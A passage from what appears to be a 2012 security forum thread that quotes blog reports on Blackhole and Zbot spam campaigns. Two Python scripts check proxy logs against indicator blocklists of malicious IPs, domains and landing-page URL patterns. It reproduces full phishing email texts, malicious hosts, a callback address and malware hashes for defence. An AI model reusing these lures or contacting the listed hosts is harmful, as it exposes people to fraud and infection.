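# Recommended blocklist quoted from the dynamoo "Zbot sites to block 5/12/12" post.
ZBOT_BLOCKLIST = [
    "31.184.244.73", "62.122.72.0/21", "77.72.133.69", "78.46.5.128/29",
    "78.140.135.211", "85.143.166.0/24", "87.107.96.0/19", "91.211.119.56",
    "91.231.156.0/24", "91.238.83.0/24", "146.185.255.0/24", "178.162.132.0/24",
    "178.162.134.128/26", "188.93.210.28", "195.88.74.110", "198.144.183.227",
]

# Hosts the dynamoo items above repeatedly name as serving the :8080/forum/links/ payload.
BLACKHOLE_HOSTS = [
    "113.197.88.226", "202.180.221.186", "203.80.16.81",
    "42.121.116.38", "208.87.243.131", "219.255.134.110",
]

# Landing-page path seen in nearly every campaign quoted in this thread.
LANDING_PATH = re.compile(r"^/forum/links/(column|public_version)\.php$")

# Single addresses become /32 networks, so one membership test covers both kinds.
NETWORKS = [ipaddress.ip_network(e, strict=False) for e in ZBOT_BLOCKLIST + BLACKHOLE_HOSTS]


def blocked_network(ip: str) -> Optional[str]:
    """Return the blocklist entry that covers ip, or None if it is not listed."""
    addr = ipaddress.ip_address(ip)
    for net in NETWORKS:
        if addr in net:
            return str(net)
    return None


def classify(dst_ip: str, url: str) -> List[str]:
    """Reasons a proxy request should be flagged; an empty list means nothing matched."""
    reasons = []
    net = blocked_network(dst_ip)
    if net:
        reasons.append(f"destination {dst_ip} is in blocklist entry {net}")
    parts = urlsplit(url)
    if parts.port == 8080 and LANDING_PATH.match(parts.path or ""):
        reasons.append(f"Blackhole landing-page pattern :8080{parts.path}")
    return reasons


# Constructed proxy log lines (not real traffic): timestamp, client, server IP, URL.
SAMPLE_LOG = """\
2012-12-05T11:40:12 10.0.0.12 202.180.221.186 http://leberiasun.ru:8080/forum/links/column.php
2012-12-05T11:40:15 10.0.0.12 93.184.216.34 http://example.com/index.html
2012-12-05T11:41:03 10.0.0.30 62.122.74.47 http://lookup.invalid/js/update.js
2012-12-05T11:42:44 10.0.0.30 8.8.8.8 http://dns.google/
"""


def scan_log(text: str) -> list:
    """Return (client, dst_ip, url, reasons) for every line that matched at least one check."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, client, dst_ip, url = line.split(maxsplit=3)
        reasons = classify(dst_ip, url)
        if reasons:
            hits.append((client, dst_ip, url, reasons))
    return hits


if __name__ == "__main__":
    for client, dst_ip, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{client} -> {dst_ip} {url}")
        for reason in reasons:
            print("    ", reason)
```

The second constructed line shows why the CIDR entries matter: 62.122.74.47 is not listed as a single host but falls inside 62.122.72.0/21, so a host-only blocklist would miss it.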
AplusWebMaster
2012-12-06, 17:16
FYI...
SPAM gets Socl ...
- http://www.gfi.com/blog/spam-gets-socl/
Dec 6, 2012 - "Microsoft have thrown open the gates to their new social network, Socl (which has a faint whiff of Pinterest about it and is also pronounced “social”. No, really). It didn’t take spammers very long to sink their claws in... we have all the Canadian Pharmacy spam you can eat...
> http://www.gfi.com/blog/wp-content/uploads/2012/12/soclspam1.jpg
... links all currently lead to a page touting a 404 error... we can only hope Microsoft (will) have a Banhammer in place to deal with what will no doubt be a bump up in bad content as word of the latest social network to hit the ground running spreads across the news. We haven’t come across any Malware links yet, but as with Tumblr, Pinterest and Twitter end-users shouldn’t abandon common sense in favour of shiny, blinky things carrying a sting in the tail..."
___
Amazon SPAM / evokeunreasoning .pro
- http://blog.dynamoo.com/2012/12/amazon-spam-evokeunreasoningpro.html
6 Dec 2012 - "A few different variants of this today, all pretending to be from Amazon and leading to malware on evokeunreasoning .pro:
Date: Thu, 6 Dec 2012 17:32:38 +0200
From: "Amazon . com" [digital-notifier@amazon.com]
Subject: Your Amazon.com order receipt.
Click here if the e-mail below is not displayed correctly.
Follow us:
Your Amazon.com Today's Deals See All Departments
Dear Amazon.com Member,
Thanks for your order, clongmore @arrowuk .com
Did you know you can view and edit your orders online, 24 hours a day? Visit Your Account.
Order Overview:
E-mail Address: [redacted]
Billing Address:
1113 4th Street
Fort North NC 71557-2319,,FL 67151}
United States
Phone: 1-491-337-0438
Order Grand Total: $ 50.99
Earn 3% rewards on your Amazon.com orders with the Amazon Visa Card. Learn More
Order Summary:
Details:
Order #: C47-8578330-3362713
Subtotal of items: $ 50.99
------
Total before tax: $ 50.99
Tax Collected: $0.00
------
Grand Total: $ 50.00
Gift Certificates: $ 0.99
------
Total for this Order: $ 50.99
Find Great Deals on Millions of Items Storewide
We hope you found this message to be useful. However, if you'd rather not receive future e-mails of this sort from Amazon.com, please opt-out here.
2012 Amazon.com, Inc. or its affiliates. All rights reserved. Amazon, Amazon.com, the Amazon.com logo and 1-Click are registered trademarks of Amazon.com, Inc. or its affiliates. Amazon.com, 475 Larry Ave. N., Seattle, MI 83304-6203. Reference: 61704824
Please note that this message was sent to the following e-mail address: [redacted]
The malicious payload is at [donotclick]evokeunreasoning .pro/detects/slowly_apply.php but at the time of writing the domain does not seem to be resolving."
___
Phishing For Bank Account Information
- http://blog.webroot.com/2012/12/06/phishing-for-bank-account-information/
Dec 6, 2012 - "... always on the look out for anything that looks ‘phishy’, even if it’s on your own personal time. Today, I opened my personal email to find this:
> https://webrootblog.files.wordpress.com/2012/11/pic1.png?w=413&h=444
Although the email looked very convincing, I don’t bank with Smile Bank so I knew something was up. Smile Bank is an actual bank based in the UK. The bad guys used a spoofed email address to make it look like it came from the legit Smile Bank domain smile.co.uk. If someone did bank with Smile Bank, I can see how they could easily be tricked. It’s the “Click here to proceed” link that gives the bad guys away. The link goes to a page hosted by pier3 .hk, which is a legitimate domain, but appears to be compromised with a simple HTM page that is a -redirect- to the real malicious site. The redirect sends you here:
> https://webrootblog.files.wordpress.com/2012/11/pic2.png?w=491&h=354
... This trick could easily be done with any large bank. Make sure to always be suspicious of any email claiming to be from your bank that -threatens- your account has been locked and insists that you need to enter your account information. Also, if the link to enter your account information isn’t to the URL of the bank it claims to be from, you know it’s malicious."
___
More "Copies of policies" SPAM / cinemaallon .ru
- http://blog.dynamoo.com/2012/12/copies-of-policies-spam-cinemaallonru.html
6 Dec 2012 - "This spam leads to malware on cinemaallon .ru:
Date: Thu, 6 Dec 2012 06:41:01 -0500
From: Isidro Pierre via LinkedIn [member @linkedin .com]
Subject: RE: ASHTON - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
ASHTON QUINONES,
The malicious payload is at [donotclick]cinemaallon .ru:8080/forum/links/column.php hosted on the following familiar IPs:
202.180.221.186 (Gnet, Mongolia)
208.87.243.131 (Psychz Networks, US)..."
___
Bogus ‘Facebook Account Cancellation Request’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/12/05/bogus-facebook-account-cancellation-request-themed-emails-serve-client-side-exploits-and-malware/
Dec 5, 2012 - "Facebook users, watch what you click on! Cybercriminals are currently mass mailing bogus “Facebook Account Cancellation Requests“, in an attempt to trick Facebook’s users into clicking on the malicious link found in the email. Upon clicking on the link, users are exposed to client-side exploits which ultimately drop malware on the affected host...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/fake_facebook_account_cancellation_email_spam_exploits_malware.png?w=629
... Sample client-side exploits served: CVE-2010-0188; CVE-2011-3544; CVE-2010-0840
Malicious domain name reconnaissance:
lakkumigdc .com – 68.168.100.135 – Email: dolphinkarthi @gmail .com
Name Server: NS1.MACROVIEWTECH .COM – 68.168.100.136
Name Server: NS2.MACROVIEWTECH .COM – 68.168.100.137
Domains responding to the same IP, including domains also registered with the same GMail account...
Upon successful client-side exploitation, the campaign drops MD5: 8b3979c1a9c85a7fd5f8ff3caf83fc56 * ... PWS-Zbot.gen.aru
Upon execution, the sample creates the following file on the affected hosts:
%AppData%\Ixriyv\emarosa.exe – MD5: A33684FD2D1FA669FF6573921F608FBB
It also creates the following directories:
%AppData%\Ixriyv
%AppData%\Uxwonyl
As well as the following Mutex: Local\{7A4AAF46-5391-8FF9-A32F-78A34C8B50D7}
It then phones back to shallowave.jumpingcrab .com (93.174.95.78) on port 8012. Another similar subdomain on this host (takemeout.jumpingcrab .com), was also seen in a crowdsourced DDoS campaign in 2009..."
* https://www.virustotal.com/file/cef26c9643aa8fd5e73ccbd2d626279e704a44f352c6de6079ee27fd2f136f00/analysis/
File name: 8b3979c1a9c85a7fd5f8ff3caf83fc56
Detection ratio: 3/46
Analysis date: 2012-12-03
___
eBay, PayPal SPAM / ibertomoralles .com
- http://blog.dynamoo.com/2012/12/ebay-paypal-spam-ibertomorallescom.html
6 Dec 2012 - "These spam messages lead to malware on ibertomoralles .com:
Date: Thu, 6 Dec 2012 13:12:16 -0600
From: "PayPal" [service @paypal .com]
Subject: Your Ebay.com transaction details.
Dec 5, 2012 09:31:49 CST
Transaction ID: U5WZP603SNLLWR5DT
Hello [redacted],
You sent a payment of $363.48 USD to Normand Akers.
It may take a several minutes for this transaction to appear in your transactions history.
Seller
Normand-Akers @aol .com
Instructions to seller
You haven't entered any instructions.
Shipping address - confirmed
Hyde Rd
Glendale SC 58037-0659
United States
Shipping details
The seller hasn't provided any shipping details yet.
Description Qty. Amount
NordicTrack Mini Cycle
Item# 118770508253 24 $363.48 USD
Shipping and handling $24.99 USD
Insurance - not offered ----
Total $363.48 USD
Payment $363.48 USD
Payment sent to Normand Akers
Receipt ID: D-69NQRGN113A3A9UQ3
Issues with this transaction?
You have 45 days from the date of the transaction to open a dispute in the Resolution Center.
Please do not reply to this message. auto informer system unable to accept incoming messages. For immediate answers to your issues, visit our Help Center by clicking "Help" located on any PayPal page.
PayPal Email ID PZ147
==========
Date: Thu, 6 Dec 2012 19:57:37 +0100
From: "PayPal" [noreply @paypal .com]
Subject: Your Paypal.com transaction confirmation.
Dec 5, 2012 09:50:54 CST
Transaction ID: 8P7D295HFIIIMUC4Q
Hello [redacted],
You done a payment of $894.48 USD to Carol Brewster.
It may take a few moments for this transfer to appear in your transactions history.
Merchant
Carol-Brewster @aol .com
Instructions to seller
You haven't entered any instructions.
Shipping address - confirmed
Pharetra Street
Manlius NY 74251-6442
United States
Shipping details
The seller hasn't provided any shipping details yet.
Description Qty. Amount
TaylorMade R11 Driver Golf Club
Item# 703099838857 54 $894.48 USD
Shipping and handling $14.49 USD
Insurance - not offered ----
Total $894.48 USD
Payment $894.48 USD
Payment sent to Carol Brewster
Receipt ID: H-K01U2WSTLZZMRAB90
Issues with this transaction?
You have 45 days from the date of the purchase to issue a dispute in the Resolution Center.
Please DO NOT reply to this message. auto-notification system can't accept incoming mail. For fast answers to your subjects, visit our Help Center by clicking "Help" located on any PayPal page.
PayPal Email ID P8695
The malicious payload is at [donotclick]ibertomoralles .com/detects/slowly_apply.php hosted on 59.57.247.185 (Xiamen JinLongLvXingChe, China). The following malicious domains also appear to be hosted on the same server..."
(More detail at the dynamoo URL above.)
:sad: :mad:
AplusWebMaster
2012-12-07, 14:20
FYI...
#1 malware threat - Blackhole exploit kits
- http://h-online.com/-1762913
5 Dec 2012 - "... according to Sophos*, 30.81% of sites hosting it are in the United States, which is followed by Russia at 17.88% and Chile at 10.77%. Sophos says that between October 2011 and March 2012, almost 30% of detected threats were either directly from Blackhole or diversions to Blackhole kits that had been rigged on formerly reputable sites... Sophos says that in 2012 the biggest problems were cloud services, the Bring Your Own Device (BYOD) movement, hacking of SQL databases, improving social engineering methods, and an increasing number of attacks on the Android mobile operating system. The latter has seen everything from SMS fraud, apparent botnets on phones, banking malware, and bogus or rogue applications from application stores..."
* http://www.sophos.com/en-us/security-news-trends/reports/security-threat-report/blackhole-exploit.aspx
Video - 3:02
Drive-by redirects and exploit sites - attack landscape on the net (graphic)
> http://www.h-online.com/security/news/item/Sophos-s-2013-threat-report-points-to-US-as-Blackhole-capital-1762913.html?view=zoom;zoom=4
Defenses against the Blackhole exploit kit
>> https://en.wikipedia.org/wiki/Blackhole_exploit_kit#Defenses_against_the_Blackhole_exploit_kit
" ... Make sure the browser, browser's plugins, and operating system are up to date..."
Test your browser here: https://browsercheck.qualys.com/?scan_type=js
___
- https://blogs.technet.com/b/security/archive/2012/11/12/blackhole-exploit-kit-activity-peaks-as-exploit-activity-on-the-internet-reaches-new-heights.aspx?Redirected=true
12 Nov 2012 - "... Blacole, a family of exploits used by the so-called Blackhole exploit kit to deliver malicious software through infected webpages, was the most commonly detected exploit family in the first half of 2012 by a large margin..."
> https://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-components-imagefileviewer/communityserver-blogs-components-weblogfiles-00-00-00-50-43/3683.2.jpg_2D00_550x0.jpg
Vulnerabilities targeted by the Blacole exploit kit in 1Q12 and 2Q12
> https://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-components-imagefileviewer/communityserver-blogs-components-weblogfiles-00-00-00-50-43/3225.3.jpg_2D00_550x0.jpg
AplusWebMaster
2012-12-07, 20:17
FYI...
Malicious ‘Security Update for Banking Accounts’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/07/malicious-security-update-for-banking-accounts-emails-lead-to-black-hole-exploit-kit/
Dec 7, 2012 - "Cybercriminals have recently launched yet another massive spam campaign attempting to trick e-banking users into thinking that their ability to process ACH transactions has been temporarily disabled. Upon clicking on the link found in the malicious email, users are exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/security_update_banking_email_spam_exploits_malware.png
Sample spamvertised compromised URLs:
hxxp ://promic .pl/page4.htm
hxxp ://promic .pl/rating.htm
Sample client-side exploits serving URLs:
hxxp ://bamanaco .ru:8080/forum/links/column.php
hxxp ://lentuiax .ru:8080/forum/links/column.php
Malicious domains reconnaissance:
bamanaco.ru – 82.165.193.26 (AS8560); 203.80.16.81 (AS24514); 216.24.196.66 (AS40676)
Name servers:
ns1.bamanaco .ru - 62.76.178.233
ns2.bamanaco .ru – 41.168.5.140
ns3.bamanaco .ru – 132.248.49.112
ns4.bamanaco .ru – 209.51.221.247
lentuiax .ru – 203.80.16.81 (AS24514)
Name servers:
ns1.lentuiax .ru – 62.76.178.233
ns2.lentuiax .ru – 41.168.5.140
ns3.lentuiax .ru – 132.248.49.112
ns4.lentuiax .ru – 209.51.221.247
Sample detection rate for the redirection script: MD5: 35e6ddb6ce4229d36c43d9d3ccd182f3 * ... Trojan-Downloader.JS.Iframe.dby.
Although we couldn’t reproduce the malicious exploitation taking place through bamanaco .ru and lentuiax .ru, we found out that, during the time of the attack, similar client-side exploit serving URLs were also responding to the same IPs, leading us to the actual malicious payload found on two of these domains..."
(More detail available at the webroot URL above.)
* https://www.virustotal.com/file/ff5efbf5e293fb849108494d6d2c1d0e452da5d4e817b9c2d293c174c3e7aab1/analysis/1353822844/
File name: August.html
Detection ratio: 21/44
Analysis date: 2012-11-25
___
Fake PayPal Emails: Windows 8 and Vintage Photo Collections
- http://www.gfi.com/blog/fake-paypal-emails-windows-8-and-vintage-photo-collections/
Dec 7, 2012 - "If you want to panic over a mysterious transaction on Ebay to the tune of $564.48 for a “Microsoft Windows 8 Pro Anytime Upgrade”, then this is probably the email you’ve been waiting for.
It reads:
You have made an Ebay.com purchase.
Hello [removed],
You sent a payment of $564.48 USD to [removed].
Microsoft Windows 8 Pro Anytime Upgrade
Item# 16 $564.48 USD
> http://www.gfi.com/blog/wp-content/uploads/2012/12/ebaywin8.png
Clicking the link in the fake PayPal email will take end-users to the usual round of Cridex / Blackhole URLs. On a similar note, there’s an additional email floating around that claims you purchased 84 copies of “Vintage photo collection sexy college girls 1990s or 2000s”.
> http://www.gfi.com/blog/wp-content/uploads/2012/12/ebaywin82.png
Last time we saw this one was back in June* where the tally was -23- ..."
* http://blog.dynamoo.com/2012/06/paypal-spam-itscholarshipznet.html
___
iTunes "Christmas gift card" SPAM / api.myobfuscate .com / nikolamireasa .com
- http://blog.dynamoo.com/2012/12/itunes-christmas-gift-card.html
6 Dec 2012 - "Here's a malware-laden spam with a twist:
From: iTunes [shipping @new. itunes .com]
To: purchasing [purchasing @ [redacted]]
Date: 6 December 2012 20:59
Subject: Christmas gift card
Order Number: M1V7577311
Receipt Date: 06/12/2012
Shipping To: purchasing @[redacted]
Order Total: $500.00
Billed To: Hilary Shandonay, Credit card
Item Number Description Unit Price
1 Christmas gift card (View\Download ) $500.00
Subtotal: $500.00
Tax: $0.00
Order Total: $500.00
Please retain for your records.
Please See Below For Terms And Conditions Pertaining To This Order.
Apple Inc.
You can find the iTunes Store Terms of Sale and Sales Policies by launching your iTunes application and clicking on Terms of Sale or Sales Policies
FBI ANTI-PIRACY WARNING
UNAUTHORIZED COPYING IS PUNISHABLE UNDER FEDERAL LAW.
Answers to frequently asked questions regarding the iTunes Store can be found at http ://www.apple .com/support/itunes/store/
Apple ID Summary | Detailed invoice
Apple respects your privacy.
Copyright © 2011 Apple Inc. All rights reserved
In this case the link goes through a free web hosting site at [donotclick]longa-neara.ucoz .org which contains some heavily obfuscated javascript that eventually leads to a malicious landing page on [donotclick]nikolamireasa .com/less/demands-probably.php hosted on 188.93.210.133 (logol .ru, Russia). That IP hosts the following toxic domains that you should block:
nikolamireasa .com
portgazza. cu .cc
hopercac. cu .cc
hopercas. cu .cc
ukumuxur. qhigh .com
ymuvyjih.25u .com
... you might just want to cut your losses and block 188.93.210.0/23 too. Anyway, the curious thing is that the malicious javascript uses an intermediary obfuscation site called api.myobfuscate .com... if the bad guys have a use for it then you can bet they are probably about to abuse it in a big way. Both api.myobfuscate .com and www .myobfuscate .com are hosted on the same IP at 188.64.170.17 (also in Russia) which is part of a tiny netblock of 188.64.170.16/31 which you may as well block too. The 188.64.170.17 IP also contains the following domains which might also be abused in the same way:
htmlobfuscator .com
api.htmlobfuscator .com
htmlobfuscator .info
javascript-obfuscator .info
javascriptcompressor .info
javascriptcrambler .com
javascriptobfuscate .com
javascriptobfuscator .info
myobfuscate .com
api.myobfuscate .com
obfuscatorjavascript .com
api.obfuscatorjavascript .com
js.robotext .com
js.robotext .info
js.robottext .ru
In my opinion, obfuscating javascript is a really bad thing and there is no legitimate reason to use it. Blocking access to free-to-use obfuscation tools like this may run the risk of breaking some legitimate sites. But only if they have been coded by idiots."
- http://www.avgthreatlabs.com/webthreats/
... last updated on Dec 08, 2012 GMT.
Viruses & Threats on the Rise
1) Cool Exploit Kit - 19.24% of all detections...
2) Blackhole Exploit Kit - 19.16% of all detections...
3) JavaScript Obfuscation - 12.70% of all detections...
___
AICPA SPAM / ibertomoralles .org
- http://blog.dynamoo.com/2012/12/aicpa-spam-ibertomorallesorg.html
7 Dec 2012 - "I haven't seen fake AICPA spam like this for a while, it leads to malware on ibertomoralles .org:
From: AICPA [noreply@aicpa.org]
Date: 7 December 2012 16:55
Subject: Your accountant license can be cancelled.
You're receiving this information as a Certified Public Accountant and a member of AICPA.
Having any problems reading this email? See it in your favorite browser.
AICPA logo
Revocation of CPA license due to income tax fraud accusations
Dear AICPA participant,
We have been informed of your potential involvement in tax return swindle on behalf of one of your employers. In obedience to AICPA Bylaw Article 700 your Certified Public Accountant position can be discontinued in case of the aiding of filing of a phony or fraudulent income tax return for your client or employer.
Please be notified below and provide explanation of this issue to it within 14 work days. The rejection to provide elucidation within this time-frame would finish in decline of your Accountant status.
Delation.pdf
The American Institute of Certified Public Accountants.
Email: service @aicpa .org
Tel. 888.777.7077
Fax. 800.362.5066
===================
Date: Fri, 7 Dec 2012 18:31:58 +0100
From: "AICPA" [do-not-reply @aicpa .org]
Subject: Tax return assistance contrivance.
You're receiving this note as a Certified Public Accountant and a part of AICPA.
Having any problems reading this email? See it in your favorite browser.
Cancellation of Public Account Status due to tax return indictment
Respected accountant officer,
We have received a note of your presumable interest in income tax fraud for one of your clients. In concordance with AICPA Bylaw Article 600 your Certified Public Accountant status can be discontinued in case of the event of submitting of a fake or fraudulent income tax return on the member's or a client's behalf.
Please familiarize yourself with the complaint below and provide your feedback to it within 14 work days. The rejection to respond within this time-frame will result in end off of your CPA license.
Delation.doc
The American Institute of Certified Public Accountants.
Email: service@aicpa.org
Tel. 888.777.7077
Fax. 800.362.5066
The malicious payload is at [donotclick]ibertomoralles.org/detects/five-wise_leads_ditto.php hosted on the same Chinese IP address of 59.57.247.185 as used in this spam yesterday*."
* http://blog.dynamoo.com/2012/12/ebay-paypal-spam-ibertomorallescom.html
___
BBB SPAM / ibertomoralles .org
- http://blog.dynamoo.com/2012/12/bbb-spam-ibertomorallesorg.html
"This bizarrely worded fake BBB spam leads to malware on ibertomoralles .org:
Date: Fri, 7 Dec 2012 18:43:08 +0100
From: "Better Business Bureau" [complaint @bbb .org]
Subject: BBB Complaint No.65183683
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau
Start With Trust
Fri, 7 Dec 2012
RE: Complaint N. 65183683
Hello
The Better Business Bureau has been booked the above said complaint from one of your purchasers in regard to their business relations with you. The detailed description of the consumer's disturbance are available visiting a link below. Please give attention to this point and let us know about your mind as soon as possible.
We amiably ask you to overview the GRIEVANCE REPORT to reply on this claim letter.
We are looking forward to your prompt reaction.
Faithfully yours
Natalie Richardson
Dispute Councilor
Better Business Bureau
3073 Wilson Blvd, Suite 600 Arlington, VA 28201
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This message was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
====================
Date: Fri, 7 Dec 2012 19:42:23 +0200
From: "Better Business Bureau" [noreply@bbb.org]
Subject: BBB Appeal No.05P610Q78
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau
Start With Trust
Fri, 7 Dec 2012
RE: Case # 05P610Q78
Hello
The Better Business Bureau has been filed the above said reclamation from one of your customers in respect of their dealings with you. The details of the consumer's disturbance are available at the link below. Please pay attention to this issue and notify us about your sight as soon as possible.
We politely ask you to visit the PLAINT REPORT to meet on this claim.
We are looking forward to your prompt reaction.
Yours respectfully
Dylan Peterson
Dispute Councilor
Better Business Bureau
3003 Wilson Blvd, Suite 600 Arlington, VA 25301
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This message was delivered to [redacted] Don't want to receive these emails anymore? You can unsubscribe
====================
From: Better Business Bureau [mailto:information@bbb.org]
Sent: Fri 07/12/2012 17:01
Subject: Better Business Beareau Pretension No.S8598593
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust
Fri, 7 Dec 2012
RE: Complaint N. S8598593
Valued client
The Better Business Bureau has been entered the above mentioned grievance from one of your clientes with reference to their dealings with you. The details of the consumer's worry are available at the link below. Please give attention to this problem and let us know about your opinion as soon as possible.
We pleasantly ask you to click and review the CLAIM LETTER REPORT to respond on this grievance.
We awaits to your prompt response.
WBR
Aiden Thompson
Dispute Advisor
Better Business Bureau
3003 Wilson Blvd, Suite 600 Arlington, VA 26701
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This letter was delivered to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The payload and IP addresses are exactly the same as the ones found in this spam run*."
* http://blog.dynamoo.com/2012/12/aicpa-spam-ibertomorallesorg.html
___
Sendspace "You have been sent a file" SPAM / pelamutrika .ru
- http://blog.dynamoo.com/2012/12/sendspave-you-have-been-sent-file-spam.html
7 Dec 2012 - "This fake Sendspace spam leads to malware on pelamutrika .ru:
Date: Fri, 7 Dec 2012 10:53:57 +0200
From: Badoo [noreply @badoo .com]
Subject: You have been sent a file (Filename: [victimname]-64.pdf)
Sendspace File Delivery Notification:
You've got a file called [victimname]-792244.pdf, (337.19 KB) waiting to be downloaded at sendspace.(It was sent by CHASSIDY PROCTOR).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
----------------------------------------------------------------------
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
The malicious payload is at [donotclick]pelamutrika .ru:8080/forum/links/column.php hosted on the following familiar IP addresses which you should definitely try to block:
202.180.221.186 (GNet, Mongolia)
208.87.243.131 (Psychz Networks, US)"
___
Searching for “Windows Android Drivers” Leads to Malware and Bogus Google Play Markets
- http://www.gfi.com/blog/searching-for-windows-android-drivers-leads-to-malware-and-bogus-google-play-markets/
7 Dec 2012 - "If you’re on the lookout for Android USB drivers for your Windows OS, be very careful. Search strings like “Windows Android Drivers”, or combinations of them, may bring up results that you would rather stay away from. Our researchers in the AV Labs have found this peculiar search result on Yahoo!... Visiting the Russian URL, bestdrivers(dash)11(dot)ru, automatically downloads a file called install.exe... Running the .exe file, which is a Trojan that we detect as Trojan.Win32.Generic!BT, allows it to modify the start page of the user’s IE browser to 94(dot)249(dot)188(dot)143/stat/tuk/187, a sign-up page for a Russian “escort” site. It does this so users are directed to the page by default whenever they open their IE browser..." (-aka- Hijacked...)
(More detail and screenshots at the gfi URL above.)
___
Christmas themed SCAMS on Facebook ...
- http://community.websense.com/blogs/securitylabs/archive/2012/12/06/merry-xmas-on-facebook.aspx
06 Dec 2012 - "... We spotted more than 3,000 unique URLs used for this scam on Facebook. The high variation is used by cyber criminals to assure persistence and redundancy in case some URLs or domains get blacklisted.
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/1007.Facebook_5F00_xmas.jpg
... Here are some of the offending IP addresses found to be part of the scam infrastructure hosting the scam web sites:
208.73.210.147
213.152.170.193
184.107.164.158
216.172.174.53
199.188.206.214
198.187.30.161
198.154.102.28
68.168.21.68
198.154.102.29
174.132.156.176
198.154.102.27
88.191.118.153
208.91.199.252
We believe that this attack is now under control and is being successfully mitigated by Facebook. We're seeing a gradual decline in incidences, but it's safe to say that while it's declining it's still going strong..."
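The Webroot and Dynamoo posts above each end with the same advice: block the landing-page hosts, the 59.57.247.185 / 188.93.210.0/23 / 188.64.170.16/31 netblocks and the second-stage domains, and watch for the kit's URL shapes (`:8080/forum/links/column.php`, `/detects/*.php`). The script below is an added example of turning those indicators into a retro-hunt over a web-proxy log; it is not code from Webroot, Dynamoo or GFI. The log format, the client addresses and the destination IPs of the non-IOC hosts are constructed for the example; the indicators themselves are transcribed from the posts.

```python
"""Hunt a web-proxy log for the Blackhole landing-page URL shapes and the
IPs, netblocks and domains the 7 Dec 2012 Webroot and Dynamoo posts say to
block.  Added example, not code from those blogs; the log format and every
log line below are constructed."""
import ipaddress
import re
from urllib.parse import urlsplit

# Landing-page URL shapes quoted in the posts.
LANDING_PATTERNS = [
    re.compile(r":8080/forum/links/column\.php$"),   # bamanaco.ru / pelamutrika.ru style
    re.compile(r"/detects/[\w-]+\.php$"),            # ibertomoralles.org style
    re.compile(r"/less/demands-probably\.php$"),     # nikolamireasa.com
]

# Netblocks and single hosts the posts recommend blocking.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "188.93.210.0/23",      # nikolamireasa.com and its neighbours (Dynamoo)
    "188.64.170.16/31",     # myobfuscate.com and the other obfuscator hosts
    "59.57.247.185/32",     # ibertomoralles.org
    "82.165.193.26/32", "203.80.16.81/32", "216.24.196.66/32",  # bamanaco.ru
    "202.180.221.186/32", "208.87.243.131/32",                  # pelamutrika.ru
)]

# Second-stage domains; sub-domains match too (api.myobfuscate.com).
BLOCKED_DOMAINS = {
    "nikolamireasa.com", "portgazza.cu.cc", "hopercac.cu.cc", "hopercas.cu.cc",
    "ukumuxur.qhigh.com", "ymuvyjih.25u.com", "bamanaco.ru", "lentuiax.ru",
    "ibertomoralles.org", "pelamutrika.ru", "myobfuscate.com",
}
# Compromised first-stage sites from the same posts: worth an alert, not a block.
REDIRECTORS = {"promic.pl", "longa-neara.ucoz.org"}

# Constructed log format: timestamp client method url destination-ip
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<dst>\S+)$")


def host_in(host, domains):
    """True if host equals, or is a sub-domain of, any entry in domains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def ip_blocked(text):
    """True if text is an IP address inside one of BLOCKED_NETS."""
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return False
    return any(addr in net for net in BLOCKED_NETS)


def classify(url, dst_ip):
    """Return the list of reasons a request is suspicious (empty if none)."""
    host = urlsplit(url).hostname or ""
    path_only = url.split("?", 1)[0]          # patterns are anchored on port+path
    reasons = []
    if any(p.search(path_only) for p in LANDING_PATTERNS):
        reasons.append("blackhole-landing-url")
    if host_in(host, BLOCKED_DOMAINS):
        reasons.append("blocked-domain")
    if host_in(host, REDIRECTORS):
        reasons.append("compromised-redirector")
    if ip_blocked(dst_ip) or ip_blocked(host):   # host may itself be a bare IP
        reasons.append("blocked-ip")
    return reasons


def hunt(lines):
    """Return (client, url, reasons) for every log line that matches an IOC."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        reasons = classify(m["url"], m["dst"])
        if reasons:
            hits.append((m["client"], m["url"], reasons))
    return hits


# Constructed sample; destination IPs for non-IOC hosts are made up.
SAMPLE_LOG = """\
2012-12-07T14:02:11Z 10.0.0.15 GET http://promic.pl/page4.htm 198.51.100.7
2012-12-07T14:02:12Z 10.0.0.15 GET http://bamanaco.ru:8080/forum/links/column.php 203.80.16.81
2012-12-07T14:05:40Z 10.0.0.22 GET http://api.myobfuscate.com/?src=abc 188.64.170.17
2012-12-07T14:06:01Z 10.0.0.22 GET http://www.example.com/index.html 93.184.216.34
2012-12-07T14:07:13Z 10.0.0.31 GET http://188.93.210.140/less/demands-probably.php 188.93.210.140
"""

if __name__ == "__main__":
    for client, url, reasons in hunt(SAMPLE_LOG.splitlines()):
        print(client, url, ",".join(reasons))
```

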